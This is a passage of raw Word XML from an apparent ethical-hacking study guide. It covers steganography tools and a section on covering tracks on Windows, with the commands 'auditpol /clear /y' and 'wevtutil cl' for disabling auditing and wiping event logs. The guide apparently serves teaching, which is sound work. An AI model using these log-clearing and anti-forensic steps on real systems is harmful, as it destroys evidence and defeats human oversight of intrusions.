              <w:t xml:space="preserve">STANDARD.FILE </w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
              </w:rPr>
              <w:t>NEW.FILE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2846C0" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRPr="00B34B21" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>Here, the contents of the first file would be put in as normal into a new file, but the secret message, TEXT GOES HERE would be hidden within the file.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>To retrieve the hidden message, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">snow </w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-C -p </w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PASSWORD</w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
              </w:rPr>
              <w:t>NEW.FILE</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>The password used to hide the message within the file is the same password needed to re-read the hidden message contents.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C708F1" w14:paraId="56DBF106" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:trPr>
          <w:trHeight w:val="2136"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="45567B6B" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>132.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="21C992E9" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>OpenStego</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D15C2B8" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r w:rsidRPr="00B614B2">
              <w:t>OpenStego is an image steganography tool that hides data inside images. It is a Java-based application that supports password-based encryption of data for an additional layer of security. It uses the DES algorithm for data encryption, in conjunction with MD5 hashing to derive the DES key from the password provided.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">OpenStego can be downloaded and used as necessary to hide other files and messages within simple picture files. </w:t>
            </w:r>
            <w:r w:rsidRPr="00E7764C">
              <w:t>You can also use other image steganography tools such as QuickStego (</w:t>
            </w:r>
            <w:r w:rsidRPr="00E7764C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http://quickcrypto.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00E7764C">
              <w:t>), SSuite Picsel</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00E7764C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">https://www.ssuitesoft.com), </w:t>
            </w:r>
            <w:r w:rsidRPr="00E7764C">
              <w:t>CryptaPix (</w:t>
            </w:r>
            <w:r w:rsidRPr="00E7764C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://www.briggsoft.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00E7764C">
              <w:t>), and gifshuffle (</w:t>
            </w:r>
            <w:r w:rsidRPr="00E7764C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http://www.darkside.com.au</w:t>
            </w:r>
            <w:r w:rsidRPr="00E7764C">
              <w:t>) to perform image steganography on the target system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C708F1" w14:paraId="2BC0257E" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="4EBA4766" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B51F430" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7211B0FF" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRPr="001E0F42" w:rsidRDefault="00C708F1" w:rsidP="00C708F1"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D0745E0" w14:textId="11CA53F7" w:rsidR="00FC0AAD" w:rsidRDefault="00FC0AAD" w:rsidP="00814CF0"/>
    <w:p w14:paraId="1A03EADF" w14:textId="77777777" w:rsidR="00FC0AAD" w:rsidRDefault="00FC0AAD">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF20D02" w14:textId="08E35E62" w:rsidR="00FC0AAD" w:rsidRDefault="00FC0AAD" w:rsidP="00FC0AAD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00065914">
        <w:lastRenderedPageBreak/>
        <w:t>Maintaining Access and Covering Tracks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clearing system logs</w:t>
      </w:r>
      <w:r w:rsidR="00736CE4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1061"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="722"/>
        <w:gridCol w:w="2372"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C708F1" w14:paraId="6B80A965" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="062CEDB0" w14:textId="6C109BA8" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00736CE4">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="04A733C3" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Clearing system logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D796382" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>To remain undetected, the intruders need to erase all evidence of security compromise from the system. To achieve this, they might modify or delete logs in the system using certain log-wiping utilities, thus removing all evidence of their presence.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54EB3762" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Various techniques used to clear the evidence of security compromise are as follow:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB89D8A" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Disable Auditing:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Disable the auditing features of the target system</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Clearing Logs:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Clears and deletes the system log entries corresponding to security compromise activities</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Manipulating Logs:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Manipulate logs in such a way that an intruder will not be caught in illegal actions</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Covering Tracks on the Network:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Use techniques such as reverse HTTP shells, reverse ICMP tunnels, DNS tunnelling, and TCP parameters to cover tracks on the network.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Covering Tracks on the OS:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Use NTFS streams to hide and cover malicious files in the target system</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Deleting Files:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Use command-line tools such as Cipher.exe to delete the data and prevent its future recovery</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Disabling Windows Functionality:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Disable Windows functionality such as last access timestamp, Hibernation, virtual memory, and system restore points to cover tracks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C708F1" w14:paraId="1AF532EB" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="41EF87F8" w14:textId="5FE7A07A" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00736CE4">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="1D400DBD" w14:textId="5EFB2FB1" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Auditpol</w:t>
            </w:r>
            <w:r w:rsidR="007C0611">
              <w:br/>
            </w:r>
            <w:r w:rsidR="007C0611" w:rsidRPr="007C0611">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Windows shell command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5BBA91" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>Auditpol.exe is the command-line utility tool to change the Audit Security settings at the category and sub-category levels. You can use Auditpol to enable or disable security auditing on local or remote systems and to adjust the audit criteria for different categories of security events.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03111B48" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1"/>
          <w:p w14:paraId="42503B06" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>In real-time, the moment intruders gain administrative privileges, they disable auditing with the help of auditpol.exe. Once they complete their mission, they turn auditing back on by using the same tool (audit.exe).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C708F1" w14:paraId="1BED325E" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="1A980558" w14:textId="423A12C4" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00736CE4">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="5511AEF9" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22727487" w14:textId="3BBBA85F" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>On a Windows shell you can enter (this will likely require admin privileges):</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C708F1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">auditpol </w:t>
            </w:r>
            <w:r w:rsidRPr="00C708F1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>/get /category:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C708F1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00242250">
              <w:t>To</w:t>
            </w:r>
            <w:r w:rsidR="00242250" w:rsidRPr="00242250">
              <w:t xml:space="preserve"> clear the audit policies</w:t>
            </w:r>
            <w:r w:rsidR="00242250">
              <w:t xml:space="preserve"> and stop audit policies being logged</w:t>
            </w:r>
            <w:r w:rsidR="00242250" w:rsidRPr="00242250">
              <w:t>, simply use:</w:t>
            </w:r>
            <w:r w:rsidR="00242250">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00242250">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00242250" w:rsidRPr="00242250">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00242250" w:rsidRPr="00242250">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">auditpol </w:t>
            </w:r>
            <w:r w:rsidR="00242250" w:rsidRPr="00242250">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>/clear /y</w:t>
            </w:r>
            <w:r w:rsidR="00242250">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00242250" w:rsidRPr="00242250">
              <w:t>(No Auditing should be shown for each policy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F42E9D" w14:paraId="06E18060" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="5B7F3BD8" w14:textId="09AC3AF5" w:rsidR="00F42E9D" w:rsidRDefault="00F42E9D" w:rsidP="00C708F1">
            <w:r>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00736CE4">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="67229822" w14:textId="77777777" w:rsidR="00F42E9D" w:rsidRDefault="00F42E9D" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>wevtutil</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B27AD27" w14:textId="35332DCA" w:rsidR="007C0611" w:rsidRDefault="007C0611" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007C0611">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Windows shell command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C2A8948" w14:textId="3F95DFDB" w:rsidR="00F42E9D" w:rsidRDefault="00F42E9D" w:rsidP="00C708F1">
            <w:r w:rsidRPr="00F42E9D">
              <w:t>The system log file contains events that are logged by the OS components. These events are often predetermined by the OS itself. System log files may contain information about device changes, device drivers, system changes, events, operations, and other changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F42E9D" w14:paraId="4683FB7D" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="0E4C6B37" w14:textId="57F6DF8D" w:rsidR="00F42E9D" w:rsidRDefault="00F42E9D" w:rsidP="00C708F1">
            <w:r>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00736CE4">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="24B9CF42" w14:textId="77777777" w:rsidR="00F42E9D" w:rsidRDefault="00F42E9D" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0750EC40" w14:textId="449BC279" w:rsidR="00F42E9D" w:rsidRDefault="00F42E9D" w:rsidP="00C708F1">
            <w:r>
              <w:t>On a Windows shell, we can use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F42E9D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">wevtutil </w:t>
            </w:r>
            <w:r w:rsidRPr="00F42E9D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>el</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>This will display a list of event logs. To clear a log, type:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F42E9D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">wevtutil </w:t>
            </w:r>
            <w:r w:rsidRPr="00F42E9D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>cl</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F42E9D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>LOGNAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C0611" w14:paraId="700752B3" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="08F1D258" w14:textId="3829C614" w:rsidR="007C0611" w:rsidRDefault="007C0611" w:rsidP="00C708F1">
            <w:r>
              <w:t>13</w:t>
            </w:r>
